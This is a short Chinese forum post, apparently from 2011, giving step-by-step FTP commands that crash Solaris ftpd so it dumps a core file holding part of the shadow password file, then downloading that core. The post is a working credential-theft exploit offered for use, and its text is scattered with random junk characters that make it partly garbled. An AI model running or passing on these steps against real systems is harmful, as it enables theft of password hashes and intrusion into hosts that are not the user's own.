該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG����,使得用戶可以獲得該機(jī)的口令文件��。具體過(guò)程如下:5 i g! J4 B; Q" d
5 H# ^2 x7 C/ n' `. m
1.通過(guò) ftp 正常登錄到目的主機(jī)上8 H4 k2 P8 F d: B+ F% x
& C" d$ u# F! ^/ B2.輸入如下命令序列:+ x# m2 J9 Y* Q- J
6 B: a; q& i6 V7 `3 j' cftp> user root wrongpasswd+ ~8 u8 O3 j- J8 y! f4 o- b- A+ @
7 J, x% k( K/ T- N4 r
ftp> quote pasv
' Z* p" u' W) K( H6 q) [8 w/ g% z4 e1 l
3.這時(shí)��,ftpd會(huì)報(bào)錯(cuò)退出���,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core���,口令文件就包含在這個(gè)core中。5 z1 P5 T& w) m) @7 q# G8 M. q
- N& n* B. F5 [4 ^8 z, j. I0 W4.再次進(jìn)入FTP >get core- y% P+ t4 N) n8 r8 C
, F% J: p, d$ Z7 `7 g9 A$ W補(bǔ)充:雖然在core只有一部分shadow��,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了9 Y3 x5 g$ i; c. h3 f
2 K& H% |9 Y* s) }; y" i! ] |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡